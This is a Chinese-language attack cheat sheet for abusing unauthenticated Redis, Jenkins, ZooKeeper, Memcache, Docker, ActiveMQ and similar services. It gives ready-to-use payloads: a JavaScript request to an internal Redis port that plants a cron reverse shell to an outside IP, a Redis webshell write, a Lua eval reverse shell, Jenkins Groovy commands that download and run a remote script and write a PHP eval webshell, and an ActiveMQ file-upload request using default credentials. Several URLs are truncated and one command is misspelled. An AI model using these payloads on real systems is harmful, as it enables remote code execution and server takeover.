Redis
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| >redis-cli -h 127.0.0.1 flunshall 192.168.0.110:6379>ping PONG 存在未授权访问
JS打内网 var cmd = new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('flushall\r\n'); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外网IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' +"\r\n"); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('save\r\n');
反弹shell
写shell 6379> config set dir /var/www/html/ 6379> config set dbfilename shell.php 6379> set x "<?php phpinfo();?>" 6379> save
Lua RCE https: 修改redis_lua.py里的 host 为目标 IP 执行返回正常,反弹shell >eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0
|
Jenkins未授权访问
1 2 3 4 5 6 7 8 9 10 11 12
| http: http: 执行命令 >println "ifconfig -a".execute().text 反弹shell >println "wget http://your.com/back.py -P /tmp/".execute().text >println "python /tmp/back.py yourIP 8080".execute().text 写shell >println "wget http://your.com/t.txt -o /var/www/html/1.php".execute().text >new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);? >'); >def webshell = '<?php @eval($_POST[1]);?>' >new File("/var/www/html/1.php").write("$webshell");
|
MongoDB未授权访问
默认端口27017直接连接进行增删改查
ZooKeeper未授权访问
1 2 3 4 5
| 默认端口2181 获得服务器环境信息 >echo envi|nc 192.168.0.1 2181 连接 >./zkCli.sh -server ip:port
|
Elasticsearch未授权访问
1 2 3 4 5
| 默认端口9200 http: http: http: http:
|
Memcache未授权访问
1 2 3
| 默认端口11211 >telnet 1.1.1.1 11211 >nc -vv 1.1.1.1 11211
|
Hadoop未授权访问
默认端口50070
Docker未授权访问
1 2 3 4
| 默认端口2375 >docker -H tcp: 默认密码 admin/shipyard
|
ActiveMQ未授权访问
1 2 3 4 5 6
| 默认端口8161 http: PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0 Content-Length: 27 Host: 1.1.1.1:8161 Connection: Close Authorization: Basic YWRtaW46YWRtaW4= 123123123123123123123123123
|